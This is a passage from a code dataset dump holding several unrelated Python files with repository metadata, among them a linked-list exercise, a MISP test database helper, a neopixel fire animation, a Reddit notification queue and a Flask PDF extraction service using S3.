principal()","repo_name":"franAndrad/python-src","sub_path":"clases/f23_e6/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20058214536","text":"class Node:\n def __init__(self, val=None):\n self.next = None\n self.val = val\n\n#This insert function cuts off the list and needs to be fixed\ndef insert(value, head, index):\n cur = head\n for i in range(index):\n cur = cur.next\n cur.next = Node(value)\n\ndef print_list(head):\n cur = head\n while cur != None:\n cur = cur.next\n if cur != None:\n print(cur.val)\n print(\"End of list.\\n\")\n\n#Build a simple list\nhead = Node()\ncur = head\n\nfor i in range(5):\n cur.next = Node()\n cur = cur.next\n cur.val = i\n\nprint_list(head)\ninsert(\"Hi!\", head, 3)\n\n#This should print 0, 1, 2, Hi!, 3, 4, End of list. but our insert\n#cuts off the tail of the list\nprint_list(head)","repo_name":"franceslinyc/Data-Structures-2023","sub_path":"Module 4 - Linked Lists, Stacks, Queues, and Deques/01 Exploration: Introduction to Linked Lists/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32893584601","text":"from framework import (\n httpHandlerDecorator,\n HttpClient,\n LoggerInstance,\n ok,\n)\nfrom models import TenancyCollection, CritterTenancy, Critter, Tenancy\nfrom util import (\n getEmailFromPathParams,\n getInternalApi,\n dictWithoutKey,\n joinUrl,\n modelToDict,\n)\nimport json\nfrom typing import List\n\n\ndef getPet(\n email: str, petName: str, httpClient: HttpClient, logger: LoggerInstance\n) -> dict:\n (internalApiUrl, internalApiKey) = getInternalApi()\n petUrl = joinUrl(internalApiUrl, \"critter\", email, petName)\n (responseOk, statusCode, data) = httpClient.get(\n petUrl, None, {\"x-api-key\": internalApiKey}\n )\n if not responseOk:\n raise Exception(\n f\"Failure ({statusCode}) at retrieving pet {petName} from user {email}\"\n )\n critter = Critter(**data)\n return critter\n\n\ndef updatePetTenancy(\n email: str,\n petData: Critter,\n tenancy: CritterTenancy,\n httpClient: HttpClient,\n logger: LoggerInstance,\n):\n (internalApiUrl, internalApiKey) = getInternalApi()\n petUrl = joinUrl(internalApiUrl, \"critter\", email, petData.petName)\n tenancy = Tenancy(tenancy.checkInDate, tenancy.checkOutDate)\n if petData.futureTenancy == None:\n petData.futureTenancy = []\n petData.futureTenancy.append(tenancy)\n petUpdatePayload = dictWithoutKey(modelToDict(petData), \"petName\", \"email\")\n (responseOk, statusCode, data) = httpClient.put(\n petUrl,\n petUpdatePayload,\n {\"x-api-key\": internalApiKey},\n )\n if not responseOk:\n # todo: create OutboundHttpException in framework so we can have standard in dealing with these\n errorMsg: str | None = (\n f\"Oubound pet update error: {data.get('errorMessage')}\"\n if data != None\n else None\n )\n raise Exception(\n errorMsg\n or f\"Failure ({statusCode}) at retrieving pet {petData.petName} from user {email}\"\n )\n addedCritterTenancy = CritterTenancy(petName=petData.petName, **tenancy.__dict__)\n return addedCritterTenancy\n\n\ndef handlerRaw(\n event, context, logger: LoggerInstance, httpClient: HttpClient, **kwargs\n):\n userEmail = getEmailFromPathParams(event)\n logger.addCtxItem(\"email\", userEmail)\n payload = event[\"body\"]\n if isinstance(payload, str):\n logger.info(f\"Received payload of type str, deserialzing\")\n payload = json.loads(payload)\n registry = TenancyCollection(\n critters=[CritterTenancy(**critter) for critter in payload.get(\"critters\")]\n ) # validation purposes\n petTenancies = registry.critters\n createdTenancies = TenancyCollection([], 0)\n for petTenancy in petTenancies:\n currentPetLogger = logger.branch(\"petIteratorForTenacyRegistry\")\n currentPetLogger.addCtxItem(\"petName\", petTenancy.petName)\n currentPetLogger.info(\n f\"Registering future tenancy for pet {petTenancy.petName}({userEmail}), from {petTenancy.checkInDate} to {petTenancy.checkOutDate}\"\n )\n petData = getPet(\n userEmail,\n petTenancy.petName,\n httpClient,\n currentPetLogger.branch(\"getPetForTenancyRegistry\"),\n )\n createdTenacy = updatePetTenancy(\n userEmail,\n petData,\n petTenancy,\n httpClient,\n currentPetLogger.branch(\"updatePetForTenancyRegistry\"),\n )\n currentPetLogger.info(\n f\"Registered future tenancy with id {createdTenacy.tenancyId} for pet {petTenancy.petName}({userEmail}), from {petTenancy.checkInDate} to {petTenancy.checkOutDate}\"\n )\n createdTenancies.critters.append(createdTenacy)\n createdTenancies.count = len(createdTenancies.critters)\n logger.info(f\"Added {len(createdTenancies.count)} tenancies\")\n return ok(modelToDict(createdTenancies))\n\n\nhandler = httpHandlerDecorator(handlerRaw)\n","repo_name":"UltimateForm/lovelycritters","sub_path":"client/tenancy/register/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6355559071","text":"import numpy as np\nimport torch \nfrom tqdm import tqdm\nimport sys\n\nsys.path.append(\"../../..\") # MDCode -> resources -> PhD\n\nfrom MLMD.resources.MDCode.Gupta_PyTorch import GuptaTorch\nfrom MLMD.resources.MDCode.Gupta_PyTorch import AtomType as GuptaParamsDict\nfrom MLMD.resources.MDCode.intengrators import VerletVelocity_Torch\nfrom MLMD.resources.MDCode.intengrators import readxyz\n\n\n\n# ----------- Initialize PyTorch ----------------\ndtype = torch.double\ntorch.set_default_dtype(dtype)\nuse_gpu = torch.cuda.is_available() #else \"cpu\"\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nif use_gpu:\n torch.set_default_tensor_type(torch.cuda.DoubleTensor)\n print(torch.cuda.device_count())\n print(torch.cuda.is_available())\nelse:\n torch.set_default_tensor_type(torch.DoubleTensor)\n# device = torch.device(\"cuda:0\") # Uncomment torch.s to run on GPU\nprint('Using device:',device)\n# ------------------------------------------------\n\n##########################################################################\n#! Main Program\n##########################################################################\n\n# Initial coordinates\nn_atms, AtmTyp, X0 = readxyz(\"coord_ini.xyz\")#Au55-ICO-ang.equil.ase.xyz\")\n# initial velocities\nn_atms, AtmTyp, V0 = readxyz(\"vel_ini.xyz\")\nV0 = torch.zeros_like(X0)\nprint(\"Coords and velocities read.\")\nprint(\"Number of atoms:\", n_atms)\n\n# *** Read input file ***\nparamsMD = open(\"input_parameters.dat\", 'r')\nline = paramsMD.readline()\n#dt(fs) Npas M_esc beta gamma0\ndt, Npas, N_esc, beta, gamma0 = list(map(float, paramsMD.readline().split()))\n_ = paramsMD.readline()\nline = paramsMD.readline().split()\n#coord velocidad distancias promedios; 1=Si,0=No \nENTRADA=[int(i) for i in line]\n# Energy and force units\n_ = paramsMD.readline()\nline = paramsMD.readline().split()\nunits = [int(i) for i in line]\n\n\n#! ------- Inicializa las variables ------\n#! *** Re-escala las coordenadas ***\nX0 *= gamma0\n#! *** Vf=beta*Vi -> Tf=beta^2 *Ti ***\nV0 *= beta #Ang/fs\n\nX0 = X0.view(-1, 3)\nV0 = V0.view(-1, 3)\n\nVV_integrator = VerletVelocity_Torch(AtmTyp, n_atms, dt=dt, units='eV')\n\nstatus = VV_integrator.Main_evolution_function(X0, V0, AtmTyp)\n\nprint(status)","repo_name":"ludwigwinkler/MLMD","sub_path":"Resources/MDCode/DinMol_PyTorch_v44_111020.py","file_name":"DinMol_PyTorch_v44_111020.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17372956935","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nread/write misp database for testing purpose\n(Easier to directly user mysql)\n\"\"\"\nfrom configuration import Configuration\n\nimport random, os, sys\nimport shlex\nimport subprocess\n\nclass DatabaseHelper:\n # mysql import\n from sqlalchemy.ext.automap import automap_base\n from sqlalchemy import create_engine\n from sqlalchemy.schema import MetaData\n # connection\n def __init__(self):\n conf = Configuration()\n Base = automap_base()\n engine = create_engine('mysql://{}:{}@{}/{}'.format(conf['mysql']['user'], conf['mysql']['password'], conf['mysql']['host'], conf['mysql']['dbname']))\n\n Base.prepare(engine, reflect=True)\n metadata = MetaData()\n metadata.reflect(bind=engine)\n self.conn = engine.connect()\n \t\n # close database\n def closedb(self):\n self.conn.close()\n\n # rename de db, create one for test\n def saveAttr(self):\n self.conn.execute(\"RENAME TABLE attributes TO saved_attributes\")\n self.conn.execute(\"CREATE TABLE attributes LIKE saved_attributes\")\n # for safety:\n self.conn.execute(\"INSERT INTO attributes (uuid, event_id, sharing_group_id, category, type, to_ids, value1, value2, comment) values('removable', 0, 0, 'external analysis', 'test', 0, 'removable', '', 'Testing table that can be removed')\")\n\n # delete attributes and rename saved_attributes to attributes\n def restoreAttr(self):\n c = \"SELECT value1 FROM attributes where attributes.type='test'\" \n for val in self.conn.execute(c):\n if val[0] == 'removable':\n self.conn.execute(\"DROP TABLE attributes\")\n self.conn.execute(\"RENAME TABLE saved_attributes TO attributes\")\n\n # add a random ip\n def addRandomIP(self):\n uuid = \"select count(*) from attributes;\"\n for val in self.conn.execute(uuid):\n uuid = val[0]\n self.conn.execute(\"INSERT INTO attributes (uuid, event_id, sharing_group_id, category, type, to_ids, value1, value2, comment) values('\"+str(uuid+1)+\"', 0, 0, 'external analysis', 'ip-dst', 1, '\" + randIPv4() + \"', '', 'Testing: Random IP for testbench :)')\")\n\n def addNRandomIP(self, N):\n for i in range(N):\n self.addRandomIP()\n\n\n\n#################\n# IP Generation #\n#################\ndef createNRandomIP(N):\n IPs = []\n i = 0\n while i < N:\n ip = randIPv4192168()\n if ip not in IPs:\n IPs.append(ip)\n i += 1\n else:\n print(\"Oups pas de bol %d\" % N)\n return IPs\n\ndef createNRandomIPRes(N):\n print(\"AIOUIEGFUYFIEZVGDIOHVJGAEHIHVGCVHIHVCGVHIV\" +str(N))\n if N > 20*256/2:\n print(\"N exceeds the maximum value\")\n sys.exit(1)\n\n # remove misp_events.csv\n if os.path.exists('../res/misp_events.csv'):\n os.remove('../res/misp_events.csv')\n\n header = 'uuid,event_id,category,type,value,comment,to_ids,date'\n CSV = [header]\n IPs = createNRandomIP(N)\n for i,IP in enumerate(IPs):\n CSV.append(str(i+1) + ',' + str(i+1) + ',test,ip-dst,' + IP + ',comment,1,20170516')\n\n with open('../res/misp_events.csv', 'w') as f:\n f.write('\\n'.join(CSV))\n\ndef randStr():\n return str(round(random.uniform(0,255)))\n\ndef randStr10():\n return str(round(random.uniform(0,9)))\n\ndef randIPv4():\n return randStr() + '.' + randStr() + '.' + randStr() + '.' + randStr()\n\ndef randIPv4192168():\n return '192.168.' + randStr10() + '.' + randStr()\n\n###############\n# Run helpers #\n###############\ndef create_rules():\n command = \"./readMisp.py --misp res -v\"\n args = shlex.split(command)\n subprocess.call(args)\n\ndef bruteforceIP():\n command = './matchRules.py --input rangeip'\n args = shlex.split(command)\n subprocess.call(args)\n","repo_name":"charly077/MISP-privacy-aware-sharing-master-thesis","sub_path":"privacy_sharing/src/benchmark/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"72940625708","text":"import re\n\nstr = \"Natural-language processing (NLP) is an area of computer science and artificial intelligence concerned with the interactions between computers and human (natural) languages.\"\n\ndef generate_ngrams(s, n):\n # Convert to lowercases\n s = s.lower()\n \n # Replace all none alphanumeric characters with spaces\n s = re.sub(r'[^a-zA-Z0-9\\s]', ' ', s)\n \n # Break sentence in the token, remove empty tokens\n tokens = [token for token in s.split(\" \") if token != \"\"]\n \n # Use the zip function to help us generate n-grams\n # Concatentate the tokens into ngrams and return\n ngrams = zip(*[tokens[i:] for i in range(n)])\n return [\" \".join(ngram) for ngram in ngrams]\n\ngrams2 = generate_ngrams(str, 2)\nprint(\"Generated 2-grams:\")\nprint(grams2)\nprint(\"--------------------------\")\n\ngrams5 = generate_ngrams(str, 5)\nprint(\"Generated 5-grams:\")\nprint(grams5)\n\n\n","repo_name":"amitranjan02/myprojects","sub_path":"nlp-week2-hour3-files-0221/nlp-week2-hour3-files/generate-ngrams.py","file_name":"generate-ngrams.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22110200432","text":"\"\"\"\n IS ANAGRAM (50CIQ 14: ANAGRAMS)\n\n Write a function, which accepts two strings, and returns True if they are anagrams, False otherwise.\n\n Example:\n Input = 'creative', 'reactive'\n Output = True\n\n Variations:\n - is_anagram_list.py\n\"\"\"\n\n\n# Questions to ask the interviewer:\n# - What type of text; ASCII, Unicode, etc.?\n# - Spaces?\n# - Capitalization?\n\n\n# APPROACH: Via Sort\n#\n# Sort the two strings and compare for equality.\n#\n# Time Complexity: O(n * log(n)), where n is the combined length of the two strings.\n# Space Complexity: O(n), where n is the combined length of the two strings.\ndef is_anagram_via_sort(s_1, s_2):\n if isinstance(s_1, str) and isinstance(s_2, str) and len(s_1) == len(s_2):\n return sorted(s_1.lower()) == sorted(s_2.lower())\n return False\n\n\n# APPROACH: Via Dictionary\n#\n# Use a dictionary to count the number of times characters were used in the strings.\n#\n# Time Complexity: O(n_1 + n_2), where n_1 and n_2 are the number of characters in the strings.\n# Space Complexity: O(max(u_1, u_2)), where u_1 and u_2 are the number of unique characters in the strings.\ndef is_anagram_via_dict(s_1, s_2):\n if isinstance(s_1, str) and isinstance(s_2, str) and len(s_1) == len(s_2):\n d = {}\n for c in s_1:\n k = c.lower()\n d[k] = d.setdefault(k, 0) + 1\n for c in s_2:\n k = c.lower()\n if k not in d:\n return False\n if d[k] > 1:\n d[k] -= 1\n else:\n d.pop(k)\n return len(d) == 0\n return False\n\n\nargs = [('', \"\"),\n (\"A\", \"A\"),\n (\"A\", \"a\"),\n (\"A\", \"B\"),\n (\"Ab\", \"Ba\"),\n (\"foo\", \"bar\"),\n (\"hello \", \"hello\"),\n ('dog', 'god'),\n ('creative', 'reactive'),\n (None, None)]\nfns = [is_anagram_via_sort,\n is_anagram_via_dict]\n\nfor s_1, s_2 in args:\n for fn in fns:\n print(f\"{fn.__name__}({s_1!r}, {s_2!r}): {fn(s_1, s_2)}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/string/is_anagram.py","file_name":"is_anagram.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18266593773","text":"# =============================================================================\n# Create a fire effect. Multiple fires can be displayed at once.\n#\n# Most of this code is taken from this gist:\n# https://gist.github.com/tdicola/63768def5b2e4e3a942b085cd2264d7b\n#\n# ... which is described in this video:\n# https://www.youtube.com/watch?v=OJlYxnBLBbk\n#\n# All this example does is take the above code and make it work with neotiles\n# (as well as adding a feature or two, like being able to define the fire\n# base).\n# =============================================================================\n\nfrom __future__ import division\nimport random\nimport time\n\ntry:\n from neopixel import ws\n STRIP_TYPE = ws.WS2811_STRIP_GRB\nexcept ImportError:\n STRIP_TYPE = None\n\nfrom neotiles import MatrixSize, TileManager, PixelColor, Tile\nfrom neotiles.matrixes import NTNeoPixelMatrix, NTRGBMatrix\n\n\n# Matrix size. cols, rows.\nMATRIX_SIZE = MatrixSize(8, 8)\n\n# For a neopixel matrix.\nLED_PIN = 18\n\n# For an RGB matrix.\nCHAIN = 2\n\n\n# -----------------------------------------------------------------------------\n# Helper functions\n# -----------------------------------------------------------------------------\n\ndef hue2rgb(p, q, t):\n # Helper for the hsl2rgb function.\n # From: http://axonflux.com/handy-rgb-to-hsl-and-rgb-to-hsv-color-model-c\n if t < 0:\n t += 1\n if t > 1:\n t -= 1\n if t < 1/6:\n return p + (q - p) * 6 * t\n if t < 1/2:\n return q\n if t < 2/3:\n return p + (q - p) * (2/3 - t) * 6\n\n return p\n\n\ndef hsl2rgb(h, s, l):\n # Convert a hue, saturation, lightness color into red, green, blue color.\n # Expects incoming values in range 0...255 and outputs values in the same\n # range.\n # From: http://axonflux.com/handy-rgb-to-hsl-and-rgb-to-hsv-color-model-c\n h /= 255.0\n s /= 255.0\n l /= 255.0\n r = 0\n g = 0\n b = 0\n\n if s == 0:\n r = l\n g = l\n b = l\n else:\n q = l * (1 + s) if l < 0.5 else l + s - l * s\n p = 2 * l - q\n r = hue2rgb(p, q, h + 1/3)\n g = hue2rgb(p, q, h)\n b = hue2rgb(p, q, h - 1/3)\n\n return int(r*255.0), int(g*255.0), int(b*255.0), 0\n\n\n# -----------------------------------------------------------------------------\n\nclass FireMatrix(object):\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.data = [0]*(width*height)\n\n def get(self, x, y):\n x %= self.width # Wrap around when x values go outside the bounds!\n y %= self.height # Like-wise wrap around y values!\n return self.data[y * self.width + x]\n\n def set(self, x, y, value):\n x %= self.width\n y %= self.height\n self.data[y * self.width + x] = value\n\n\nclass FireTile(Tile):\n \"\"\"\n Defines a tile which displays a fire effect.\n\n :param size_divisor: (float) Affects the height of the fire.\n :param hue_offset: (int) Affects the color palette of the fire.\n :param base: ('bottom'|'top') Base of the fire.\n \"\"\"\n def __init__(self, size_divisor=10.0, hue_offset=0, base='bottom'):\n super(FireTile, self).__init__()\n\n self.size_divisor = size_divisor\n self.hue_offset = hue_offset\n self.base = base\n\n self.fire = None\n self.palette = []\n self.frame = 0\n\n for x in range(256):\n self.palette.append(\n PixelColor(\n *hsl2rgb(self.hue_offset + (x // 3), 255, min(255, x * 2)),\n normalized=False))\n\n def on_size_set(self):\n # When the size of the tile is set by the TileManager, we want to\n # initialize our FireMatrix.\n self.fire = FireMatrix(self.size.cols, self.size.rows + 1)\n\n def draw(self):\n # Set the base concealed row to random intensity values (0 to 255).\n # The concealed row is there to reduce the base intensity, resulting in\n # a more pleasing result (see the video linked to above).\n concealed_row = self.size.rows if self.base == 'bottom' else -1\n for x in range(self.size.cols):\n self.fire.set(x, concealed_row, int(random.random() * 255))\n\n if self.base == 'bottom':\n row_list = list(range(self.size.rows))\n row_index_direction = 1\n else:\n row_list = list(reversed(range(self.size.rows)))\n row_index_direction = -1\n\n # Perform a step of flame intensity calculation.\n for x in range(self.size.cols):\n for y in row_list:\n value = 0\n value += self.fire.get(x - 1, y + row_index_direction)\n value += self.fire.get(x, y + row_index_direction)\n value += self.fire.get(x + 1, y + row_index_direction)\n value += self.fire.get(x, y + (row_index_direction * 2))\n value = int(value / self.size_divisor)\n self.fire.set(x, y, value)\n\n # Convert the fire intensity values to neopixel colors and update the\n # pixels.\n for x in range(self.size.cols):\n for y in range(self.size.rows):\n self.set_pixel((x, y), self.palette[self.fire.get(x, y)])\n\n\n# -----------------------------------------------------------------------------\n\ndef main():\n # Initialize our matrix, animating at 10 frames per second.\n tiles = TileManager(\n NTNeoPixelMatrix(MATRIX_SIZE, LED_PIN, strip_type=STRIP_TYPE),\n draw_fps=10\n )\n #tiles = TileManager(NTRGBMatrix(chain_length=CHAIN), draw_fps=10)\n\n # Play with this number to set the fire height. 4.3 is pretty good for\n # an RGB matrix of 32 rows. 7.2 is pretty good for a neopixel matrix of\n # 8 rows.\n size_divisor = 7.2\n\n # Create two tiles based on our FireTile class. One will display a red\n # fire based at the bottom of the matrix and the other will display a\n # green fire based at the top of the matrix.\n red_fire = FireTile(size_divisor=size_divisor)\n grn_fire = FireTile(size_divisor=size_divisor, hue_offset=50, base='top')\n\n # Each fire will take half the width of the matrix, and the full height.\n fire_width = int(MATRIX_SIZE.cols // 2)\n fire_height = MATRIX_SIZE.rows\n\n tiles.register_tile(red_fire, size=(fire_width, fire_height), root=(0, 0))\n tiles.register_tile(grn_fire, size=(fire_width, fire_height),\n root=(fire_width, 0))\n\n # Kick off the matrix animation loop.\n tiles.draw_hardware_matrix()\n\n # Keep animating the fires until the user Ctrl-C's the process.\n try:\n while True:\n time.sleep(0.5)\n except KeyboardInterrupt:\n tiles.draw_stop()\n tiles.clear_hardware_matrix()\n\n\n# =============================================================================\n\nif __name__ == '__main__':\n main()\n","repo_name":"mjoblin/neotiles","sub_path":"examples/fire.py","file_name":"fire.py","file_ext":"py","file_size_in_byte":6857,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"10054736682","text":"from distutils.core import setup, Extension\nfrom Cython.Build import cythonize\n\next = Extension(\"rvimodule\", \n sources=[\"rvimodule.pyx\"],\n libraries=[\"rvi\"],\n extra_compile_args=[\"-fopenmp\", \"-O3\", \"-I../include\"],\n extra_link_args=[\"-L../src/.libs/\"]\n )\n\nsetup(\n name=\"rvimodule\",\n ext_modules=cythonize([ext])\n)\n","repo_name":"GENIVI/rvi_lib","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"32187855024","text":"import re\n\nfrom praw.models import Submission\n\nfrom model import Database, MessageText, Notification, Post, Redis, User, Location\nfrom text import sort_days, parse_flair\n\n\ndef __build_user_search(post: Post) -> User:\n user_search = User()\n user_search.game = post.game\n user_search.timezone = post.timezone\n user_search.day = post.day\n user_search.online = post.online\n user_search.nsfw = int(post.nsfw)\n user_search.play_by_post = int(post.play_by_post)\n user_search.one_shot = int(post.one_shot)\n user_search.lgbtq = int(post.lgbtq)\n user_search.age_limit = post.age_limit\n user_search.vtt = post.vtt\n\n user_search.flair = parse_flair(post.flair)\n return user_search\n\n\ndef filter_user_list(users: list, submission: Submission) -> list:\n filtered_users = []\n for user in users:\n if user.username == submission.author.name:\n pass\n elif not user.keyword:\n filtered_users.append(user.username)\n elif re.search(rf\"{user.keyword}\", submission.title + submission.selftext, re.IGNORECASE):\n filtered_users.append(user.username)\n return filtered_users\n\n\ndef find_users_and_queue(db: Database, submission: Submission, post: Post) -> str:\n redis = Redis()\n\n user_search = __build_user_search(post)\n\n if not post.flair:\n return \"Missing flair\"\n if post.online == Location.NONE.value:\n return \"Missing online or offline\"\n if not post.game:\n return \"Missing or invalid game\"\n\n users = user_search.find_users(db)\n if not users:\n return None\n\n users = filter_user_list(users, submission)\n\n flags = post.flags_as_string_list()\n notification = Notification()\n notification.subject = MessageText.SUBMISSION_NOTIFICATION_SUBJECT\n notification.body = (\n f\"Title: {submission.title} \\n\"\n f\"Flair: {submission.link_flair_text} \\n\"\n f\"Timezone(s): {', '.join(post.timezone) if post.timezone else 'Unknown'} \\n\"\n f\"Day(s): {', '.join(sort_days(post.day)) if post.day else 'Unknown'} \\n\"\n f\"Time: {post.time if post.time else 'Unknown'} \\n\"\n f\"Notes: {', '.join(flags) if flags else 'None'} \\n\"\n f\"Link: https://www.reddit.com{post.permalink} \\n\"\n f\"{MessageText.SUBMISSION_NOTIFICATION_BODY}\"\n )\n notification.type = Notification.NotificationType.SUBMISSION\n\n for user in users:\n notification.username = user\n redis.append(notification)\n\n return \", \".join(users)\n","repo_name":"hunter-read/lfg-notify-bot","sub_path":"src/service/submission_queueing.py","file_name":"submission_queueing.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"4390960447","text":"import json\nimport argparse\nimport glob\nimport os\nimport time\nfrom datetime import timedelta\nfrom flask import Flask, Response, request\nimport shutil\nimport traceback\nfrom s3_communication import S3Communication\n\nfrom esg_data_pipeline.components import Extractor\nfrom esg_data_pipeline.config import config\nfrom esg_data_pipeline.components import Curator\n\napp = Flask(__name__)\n\n\ndef create_directory(directory_name):\n os.makedirs(directory_name, exist_ok=True)\n for filename in os.listdir(directory_name):\n file_path = os.path.join(directory_name, filename)\n try:\n os.unlink(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n\n@app.route(\"/liveness\")\ndef liveness():\n return Response(response={}, status=200)\n\n\n@app.route('/extract/')\ndef run_extraction():\n args = json.loads(request.args['payload'])\n project_name = args[\"project_name\"]\n \n extraction_settings = args['extraction']\n \n BASE_DATA_PROJECT_FOLDER = config.DATA_FOLDER / project_name\n config.PDF_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'pdfs' \n BASE_INTERIM_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'ml'\n config.EXTRACTION_FOLDER = BASE_INTERIM_FOLDER / 'extraction'\n config.ANNOTATION_FOLDER = BASE_INTERIM_FOLDER / 'annotations'\n config.STAGE = 'extract'\n \n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n create_directory(config.PDF_FOLDER)\n \n s3_usage = args[\"s3_usage\"]\n if s3_usage:\n s3_settings = args[\"s3_settings\"]\n project_prefix = s3_settings['prefix'] + \"/\" + project_name + '/data'\n # init s3 connector\n s3c_main = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['main_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['main_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['main_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['main_bucket']['s3_bucket_name']),\n )\n s3c_interim = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['interim_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['interim_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['interim_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['interim_bucket']['s3_bucket_name']),\n )\n if extraction_settings['use_extractions']:\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/output/TEXT_EXTRACTION', \n config.EXTRACTION_FOLDER)\n s3c_interim.download_files_in_prefix_to_dir(project_prefix + '/interim/ml/annotations', \n config.ANNOTATION_FOLDER)\n if args['mode'] == 'train':\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/pdfs/training', \n config.PDF_FOLDER)\n else:\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/pdfs/inference', \n config.PDF_FOLDER)\n \n pdfs = glob.glob(os.path.join(config.PDF_FOLDER, \"*.pdf\"))\n if len(pdfs) == 0:\n msg = \"No pdf files found in the pdf directory ({})\".format(config.PDF_FOLDER)\n return Response(msg, status=500)\n \n annotation_files = glob.glob(os.path.join(config.ANNOTATION_FOLDER, \"*.csv\"))\n if len(annotation_files) == 0:\n msg = \"No annotations.csv file found on S3.\"\n return Response(msg, status=500)\n elif len(annotation_files) > 2:\n msg = \"Multiple annotations.csv files found on S3.\"\n return Response(msg, status=500)\n \n config.SEED = extraction_settings[\"seed\"]\n config.PDFTextExtractor_kwargs['min_paragraph_length'] = extraction_settings[\"min_paragraph_length\"]\n config.PDFTextExtractor_kwargs['annotation_folder'] = extraction_settings[\"annotation_folder\"]\n config.PDFTextExtractor_kwargs['skip_extracted_files'] = extraction_settings[\"skip_extracted_files\"]\n\n ext = Extractor(config.EXTRACTORS)\n\n try:\n t1 = time.time()\n ext.run_folder(config.PDF_FOLDER, config.EXTRACTION_FOLDER)\n t2 = time.time()\n except Exception as e:\n msg = \"Error during extraction\\nException:\" + str(e)\n return Response(msg, status=500)\n\n extracted_files = os.listdir(config.EXTRACTION_FOLDER)\n if len(extracted_files) == 0:\n msg = \"Extraction Failed. No file was found in the extraction directory ({})\"\\\n .format(config.EXTRACTION_FOLDER)\n return Response(msg, status=500)\n\n failed_to_extract = \"\"\n for pdf in pdfs:\n pdf = os.path.basename(pdf)\n pdf = pdf.split(\".pdf\")[0]\n if not any([pdf in e for e in extracted_files]):\n failed_to_extract += pdf + \"\\n\"\n\n msg = \"Extraction finished successfully.\"\n if len(failed_to_extract) > 0:\n msg += \"The following pdf files, however, did not get extracted:\\n\" + failed_to_extract\n \n if s3_usage:\n s3c_interim.upload_files_in_dir_to_prefix(config.EXTRACTION_FOLDER, \n project_prefix + '/interim/ml/extraction')\n # clear folder\n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n create_directory(config.PDF_FOLDER)\n time_elapsed = str(timedelta(seconds=t2 - t1))\n msg += \"\\nTime elapsed:{}\".format(time_elapsed)\n return Response(msg, status=200)\n\n\n@app.route('/curate/')\ndef run_curation():\n args = json.loads(request.args['payload'])\n project_name = args[\"project_name\"]\n curation_settings = args[\"curation\"]\n\n BASE_DATA_PROJECT_FOLDER = config.DATA_FOLDER / project_name\n BASE_INTERIM_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'ml'\n config.EXTRACTION_FOLDER = BASE_INTERIM_FOLDER / 'extraction'\n config.CURATION_FOLDER = BASE_INTERIM_FOLDER / 'curation'\n config.ANNOTATION_FOLDER = BASE_INTERIM_FOLDER / 'annotations'\n config.KPI_FOLDER = BASE_DATA_PROJECT_FOLDER / 'interim' / 'kpi_mapping'\n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.CURATION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n \n s3_usage = args[\"s3_usage\"]\n if s3_usage:\n s3_settings = args[\"s3_settings\"]\n project_prefix = s3_settings['prefix'] + \"/\" + project_name + '/data'\n # init s3 connector\n s3c_main = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['main_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['main_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['main_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['main_bucket']['s3_bucket_name']),\n )\n s3c_interim = S3Communication(\n s3_endpoint_url=os.getenv(s3_settings['interim_bucket']['s3_endpoint']),\n aws_access_key_id=os.getenv(s3_settings['interim_bucket']['s3_access_key']),\n aws_secret_access_key=os.getenv(s3_settings['interim_bucket']['s3_secret_key']),\n s3_bucket=os.getenv(s3_settings['interim_bucket']['s3_bucket_name']),\n )\n 